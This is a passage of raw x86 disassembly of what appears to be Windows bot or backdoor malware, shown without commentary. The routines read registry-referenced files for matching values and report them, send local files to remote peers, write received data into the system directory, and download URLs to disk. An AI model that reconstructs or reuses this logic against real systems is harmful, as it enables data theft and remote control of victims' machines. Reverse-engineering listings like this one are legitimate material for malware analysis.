jz short loc_416342
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call dword_4E3154 ; SendMessageA
loc_416342: ; CODE XREF: sub_416159+63�j
; sub_416159+D0�j ...
push [ebp+var_4]
call dword_4E31A8 ; DestroyWindow
mov eax, ebx
loc_41634D: ; CODE XREF: sub_416159+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_416159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416352(int,size_t Size,int,int,int)
sub_416352 proc near ; CODE XREF: sub_401CC7+75D7�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Memory = dword ptr -4
arg_0 = dword ptr 8
Size = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_4EAD6C
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow_0 ; "Window"
call dword_4E3048
mov edi, eax
cmp edi, ebx
jnz short loc_416390
mov eax, esi
jmp loc_41658C
; ---------------------------------------------------------------------------
loc_416390: ; CODE XREF: sub_416352+35�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4163AD
push ebx
push [ebp+Size]
push 40Ah
push edi
call dword_4E3154 ; SendMessageA
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163AD: ; CODE XREF: sub_416352+47�j
xor eax, eax
loc_4163AF: ; CODE XREF: sub_416352+59�j
cmp eax, ebx
jnz short loc_4163BA
loc_4163B3: ; CODE XREF: sub_416352+8B�j
; sub_416352+BC�j
mov ebx, esi
jmp loc_416583
; ---------------------------------------------------------------------------
loc_4163BA: ; CODE XREF: sub_416352+5F�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4163DA
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call dword_4E3154 ; SendMessageA
loc_4163DA: ; CODE XREF: sub_416352+71�j
cmp [ebp+var_7C], ebx
jz short loc_4163B3
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4163FD
push ebx
push ebx
push 42Ch
push edi
call dword_4E3154 ; SendMessageA
mov [ebp+Size], eax
jmp short loc_416400
; ---------------------------------------------------------------------------
loc_4163FD: ; CODE XREF: sub_416352+96�j
mov [ebp+Size], ebx
loc_416400: ; CODE XREF: sub_416352+A9�j
push [ebp+Size] ; Size
call _malloc
cmp eax, ebx
pop ecx
mov [ebp+Memory], eax
jz short loc_4163B3
push [ebp+Size] ; Size
call _malloc
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_416427
push 1
pop ebx
jmp loc_416583
; ---------------------------------------------------------------------------
loc_416427: ; CODE XREF: sub_416352+CB�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_416444
push [ebp+Memory]
push [ebp+Size]
push 42Ch
push edi
call dword_4E3154 ; SendMessageA
loc_416444: ; CODE XREF: sub_416352+DE�j
push [ebp+Size] ; Size
push [ebp+Memory] ; Src
push esi ; Dst
call _memcpy
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_41645F
mov ecx, 0A0h
loc_41645F: ; CODE XREF: sub_416352+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_416469
push 78h
pop eax
loc_416469: ; CODE XREF: sub_416352+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4164AE
push esi
push [ebp+Size]
push 42Dh
push edi
call dword_4E3154 ; SendMessageA
loc_4164AE: ; CODE XREF: sub_416352+14A�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_4164CB
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call dword_4E3154 ; SendMessageA
loc_4164CB: ; CODE XREF: sub_416352+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_416509
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call dword_4E3154 ; SendMessageA
loc_416509: ; CODE XREF: sub_416352+1A3�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_416524
push [ebp+arg_0]
push ebx
push 414h
push edi
call dword_4E3154 ; SendMessageA
loc_416524: ; CODE XREF: sub_416352+1C0�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_41653D
push ebx
push ebx
push 43Eh
push edi
call dword_4E3154 ; SendMessageA
loc_41653D: ; CODE XREF: sub_416352+1DB�j
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_41655A
push [ebp+Memory]
push [ebp+Size]
push 42Dh
push edi
call dword_4E3154 ; SendMessageA
loc_41655A: ; CODE XREF: sub_416352+1F4�j
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push edi
call dword_4E3098 ; IsWindow
test eax, eax
jz short loc_416583
push ebx
push ebx
push 40Bh
push edi
call dword_4E3154 ; SendMessageA
loc_416583: ; CODE XREF: sub_416352+63�j
; sub_416352+D0�j ...
push edi
call dword_4E31A8 ; DestroyWindow
mov eax, ebx
loc_41658C: ; CODE XREF: sub_416352+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_416352 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416591 proc near ; CODE XREF: sub_401CC7+25E2�p
Dest = byte ptr -3F0h
var_2EC = dword ptr -2ECh
var_EC = byte ptr -0ECh
Str = byte ptr -6Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F0h
push edi
xor edi, edi
cmp off_44D33C, edi
mov [ebp+var_8], 80h
jz loc_416736
push ebx
push esi
mov eax, offset off_44D33C
mov esi, offset dword_44D348
loc_4165BC: ; CODE XREF: sub_416591+19D�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push edi
push dword ptr [eax]
push dword ptr [esi-10h]
call dword_4E3168 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_EC]
push eax
push edi
push edi
push dword ptr [esi-8]
push [ebp+var_4]
call dword_4E2FF8 ; RegQueryValueExA
test eax, eax
jnz loc_41671C
mov eax, [esi]
cmp eax, edi
jz loc_4166DC
push eax
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+Dest]
push offset aSS_7 ; "%s\\%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push offset aR_1 ; "r"
push eax ; Filename
call _fopen
mov ebx, eax
add esp, 18h
cmp ebx, edi
jz loc_41671C
loc_416633: ; CODE XREF: sub_416591+C9�j
push ebx
lea eax, [ebp+Str]
push 64h
push eax
call sub_41F210
add esp, 0Ch
test eax, eax
jz loc_4166D3
push dword ptr [esi+4] ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_416633
push 3Dh ; Val
push dword ptr [esi+4] ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jz short loc_416693
lea eax, [ebp+Str]
push offset asc_44E610 ; "="
push eax ; Str
call _strtok
push offset asc_44E614 ; "="
push edi ; Str
call _strtok
add esp, 10h
push eax
push dword ptr [esi-4]
push offset dword_44E618
jmp short loc_41669F
; ---------------------------------------------------------------------------
loc_416693: ; CODE XREF: sub_416591+D9�j
lea eax, [ebp+Str]
push eax
push dword ptr [esi-4]
push offset asc_44E630 ; "-"
loc_41669F: ; CODE XREF: sub_416591+100�j
lea eax, [ebp+var_2EC]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_2EC]
push edi ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+var_2EC]
push eax
call sub_415C3F
add esp, 18h
loc_4166D3: ; CODE XREF: sub_416591+B3�j
push ebx ; File
call _fclose
pop ecx
jmp short loc_41671C
; ---------------------------------------------------------------------------
loc_4166DC: ; CODE XREF: sub_416591+65�j
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset asc_44E648 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+var_2EC]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+var_2EC]
push eax
call sub_415C3F
add esp, 28h
loc_41671C: ; CODE XREF: sub_416591+5B�j
; sub_416591+9C�j ...
push [ebp+var_4]
call dword_4E30D4 ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], edi
lea eax, [esi-0Ch]
jnz loc_4165BC
pop esi
pop ebx
loc_416736: ; CODE XREF: sub_416591+19�j
pop edi
leave
retn
sub_416591 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416739 proc near ; CODE XREF: sub_4167BF+33�p
; sub_416D25+BC�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4E3178 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_4167B5
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4E30F8 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4E3138 ; inet_addr
cmp eax, esi
jnz short loc_41679A
push [ebp+arg_0]
call dword_4E317C ; gethostbyname
test eax, eax
jz short loc_4167B5
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_41679A: ; CODE XREF: sub_416739+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4E30A0 ; connect
cmp eax, esi
jnz short loc_4167B9
push edi
call dword_4E3190 ; closesocket
loc_4167B5: ; CODE XREF: sub_416739+1B�j
; sub_416739+58�j
mov eax, esi
jmp short loc_4167BB
; ---------------------------------------------------------------------------
loc_4167B9: ; CODE XREF: sub_416739+73�j
mov eax, edi
loc_4167BB: ; CODE XREF: sub_416739+7E�j
pop edi
pop esi
leave
retn
sub_416739 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167BF proc near ; DATA XREF: sub_401CC7+A06�o
Dst = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_416739
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_416852
lea eax, [ebp+Dst]
push offset asc_44E660 ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_416835
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409D34
add esp, 14h
loc_416835: ; CODE XREF: sub_4167BF+59�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_416852: ; CODE XREF: sub_4167BF+3F�j
push offset dword_4EADD0
push ebx
call sub_41AB45
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4168BD
lea eax, [ebp+Dst]
push offset asc_44E684 ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_416899
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409D34
add esp, 14h
loc_416899: ; CODE XREF: sub_4167BF+BD�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
pop ecx
push ebx
call dword_4E3190 ; closesocket
push [ebp+var_10]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_4168BD: ; CODE XREF: sub_4167BF+A3�j
push 64h
call ds:dword_4F534C ; Sleep
xor edi, edi
mov esi, 1000h
loc_4168CC: ; CODE XREF: sub_4167BF+168�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push edi
push esi
push eax
push ebx
call dword_4E3110 ; recv
test eax, eax
jle short loc_416929
lea eax, [ebp+Dst]
push offset asc_44E6B4 ; "\n"
push eax ; Dest
call _strcat
lea eax, [ebp+Dst]
push eax ; Str
call sub_41A931
add esp, 0Ch
test eax, eax
jz short loc_416929
push 64h
call ds:dword_4F534C ; Sleep
push 0Ah
call sub_40B99E
test eax, eax
pop ecx
jnz short loc_4168CC
loc_416929: ; CODE XREF: sub_4167BF+130�j
; sub_4167BF+154�j
lea eax, [ebp+Dst]
push offset asc_44E6B8 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_41695C
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409D34
add esp, 14h
loc_41695C: ; CODE XREF: sub_4167BF+180�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
pop ecx
push ebx
call dword_4E3190 ; closesocket
push [ebp+var_10]
call sub_40BA72
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
sub_4167BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416980 proc near ; DATA XREF: sub_401CC7+78DA�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
Dest = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
Str = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dst = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_4E3178 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_4169CE
push offset unk_44E6EC
jmp loc_416B87
; ---------------------------------------------------------------------------
loc_4169CE: ; CODE XREF: sub_416980+42�j
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push esi
call dword_4E30F8 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_4E3124 ; bind
test eax, eax
jz short loc_416A0C
push offset unk_44E710
jmp loc_416B87
; ---------------------------------------------------------------------------
loc_416A0C: ; CODE XREF: sub_416980+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E309C ; getsockname
push [ebp+var_2E]
call dword_4E3028 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+Str]
push eax ; Str
mov [ebp+arg_0], esi
call _strlen
pop ecx
loc_416A3E: ; CODE XREF: sub_416980+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+Str]
cmp al, 20h
jnz short loc_416A51
push 5Fh
pop eax
jmp short loc_416A54
; ---------------------------------------------------------------------------
loc_416A51: ; CODE XREF: sub_416980+CA�j
movsx eax, al
loc_416A54: ; CODE XREF: sub_416980+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+Str]
inc ecx
push eax ; Str
mov [ebp+arg_0], ecx
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_416A3E
push ebx
push edi
call dword_4E3120 ; listen
test eax, eax
jz short loc_416A87
push offset unk_44E734
jmp loc_416B87
; ---------------------------------------------------------------------------
loc_416A87: ; CODE XREF: sub_416980+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+Str]
push 80000000h
push eax
call ds:dword_4F53C0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_416AB1
push offset unk_44E758
jmp loc_416B87
; ---------------------------------------------------------------------------
loc_416AB1: ; CODE XREF: sub_416980+125�j
push esi
push eax
call ds:dword_4F53DC ; GetFileSize
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AF71
pop ecx
push eax
call dword_4E3138 ; inet_addr
push eax
call dword_4E30F4 ; htonl
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset dword_44E778 ; Format
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D34
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_4E30E0 ; select
test eax, eax
jg short loc_416B61
push esi ; int
lea eax, [ebp+var_DC]
push [ebp+var_54] ; int
push offset dword_44E790 ; int
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D34
jmp loc_416C85
; ---------------------------------------------------------------------------
loc_416B61: ; CODE XREF: sub_416980+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_4E318C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_416B9A
push offset asc_44E7A8 ; "-"
loc_416B87: ; CODE XREF: sub_416980+49�j
; sub_416980+87�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_416C88
; ---------------------------------------------------------------------------
loc_416B9A: ; CODE XREF: sub_416980+200�j
push edi
call dword_4E3190 ; closesocket
cmp [ebp+arg_0], esi
jz loc_416C4C
mov edi, 400h
loc_416BAF: ; CODE XREF: sub_416980+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_416BBC
mov [ebp+var_4], eax
loc_416BBC: ; CODE XREF: sub_416980+237�j
push edi ; Size
lea eax, [ebp+var_A04]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:dword_4F53F4 ; SetFilePointer
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:dword_4F53BC ; ReadFile
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_4E3148 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_4E3110 ; recv
cmp eax, ebx
jl loc_416CE1
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_416CE1
sub [ebp+arg_0], eax
jnz loc_416BAF
mov edi, [ebp+var_18]
loc_416C4C: ; CODE XREF: sub_416980+224�j
push [ebp+var_8]
call ds:dword_4F533C ; CloseHandle
push [ebp+var_C]
push [ebp+var_10]
call sub_41748B
pop ecx
pop ecx
push eax
push [ebp+var_44]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset asc_44E7FC ; "-"
push eax ; Dest
call _sprintf
loc_416C85: ; CODE XREF: sub_416980+1DC�j
add esp, 14h
loc_416C88: ; CODE XREF: sub_416980+215�j
cmp [ebp+var_50], esi
jnz short loc_416CAD
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_54] ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D34
add esp, 14h
loc_416CAD: ; CODE XREF: sub_416980+30B�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
cmp edi, esi
pop ecx
jbe short loc_416CC5
push edi
call dword_4E3190 ; closesocket
loc_416CC5: ; CODE XREF: sub_416980+33C�j
push [ebp+var_1F8]
call dword_4E3190 ; closesocket
push [ebp+var_58]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_416CE1: ; CODE XREF: sub_416980+2AF�j
; sub_416980+2BA�j
push esi ; int
lea eax, [ebp+var_DC]
push [ebp+var_54] ; int
push offset dword_44E7CC ; int
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409D34
push offset dword_44E7E4
call sub_415C3F
add esp, 18h
push [ebp+var_1F8]
call dword_4E3190 ; closesocket
push [ebp+var_58]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_416980 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D25 proc near ; DATA XREF: sub_401CC7+7A5�o
Dst = byte ptr -14C4h
Dest = byte ptr -4C4h
Filename = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+Filename]
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Filename]
push offset aSS_8 ; "%s%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Filename]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:dword_4F53C0 ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_416DAF
push offset unk_44E830
jmp short loc_416DF5
; ---------------------------------------------------------------------------
loc_416DAF: ; CODE XREF: sub_416D25+81�j
push eax
call ds:dword_4F533C ; CloseHandle
lea eax, [ebp+Filename]
push offset aAB ; "a+b"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_416DD7
push offset unk_44E864
jmp short loc_416DF5
; ---------------------------------------------------------------------------
loc_416DD7: ; CODE XREF: sub_416D25+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_416739
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_416E08
push offset asc_44E890 ; "-"
loc_416DF5: ; CODE XREF: sub_416D25+88�j
; sub_416D25+B0�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_416F04
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: sub_416D25+C9�j
mov esi, 1000h
loc_416E0D: ; CODE XREF: sub_416D25+14E�j
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4E3110 ; recv
mov edi, eax
cmp edi, ebx
jz loc_416ED4
cmp edi, 0FFFFFFFFh
jz short loc_416E75
push [ebp+File] ; File
lea eax, [ebp+Dst]
push edi ; Count
push 1 ; Size
push eax ; Str
call sub_421420
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_4E30F4 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
jmp short loc_416E0D
; ---------------------------------------------------------------------------
loc_416E75: ; CODE XREF: sub_416D25+118�j
lea eax, [ebp+Dest]
push offset asc_44E8B0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1C0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+File] ; File
call _fclose
add esp, 24h
push [ebp+arg_0]
call dword_4E3190 ; closesocket
push [ebp+var_1C]
call sub_40BA72
pop ecx
push 1
call ds:dword_4F53A0 ; ExitThread
loc_416ED4: ; CODE XREF: sub_416D25+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+Dest]
push offset asc_44E8C8 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
loc_416F04: ; CODE XREF: sub_416D25+DE�j
cmp [ebp+var_14], ebx
jnz short loc_416F29
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1C0] ; int
call sub_409D34
add esp, 14h
loc_416F29: ; CODE XREF: sub_416D25+1E2�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
cmp [ebp+File], ebx
pop ecx
jz short loc_416F44
push [ebp+File] ; File
call _fclose
pop ecx
loc_416F44: ; CODE XREF: sub_416D25+214�j
cmp [ebp+arg_0], ebx
jbe short loc_416F52
push [ebp+arg_0]
call dword_4E3190 ; closesocket
loc_416F52: ; CODE XREF: sub_416D25+222�j
push [ebp+var_1C]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_416D25 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F62 proc near ; DATA XREF: sub_401CC7+62FA�o
; sub_401CC7+6B3A�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
Dst = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
Str = byte ptr -2C8h
var_248 = byte ptr -248h
Filename = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
Memory = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_4E30A8
call dword_4E2FFC ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_4173EE
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+Filename]
push 40000000h
push eax
call ds:dword_4F53C0 ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_417029
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset asc_44E8F4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
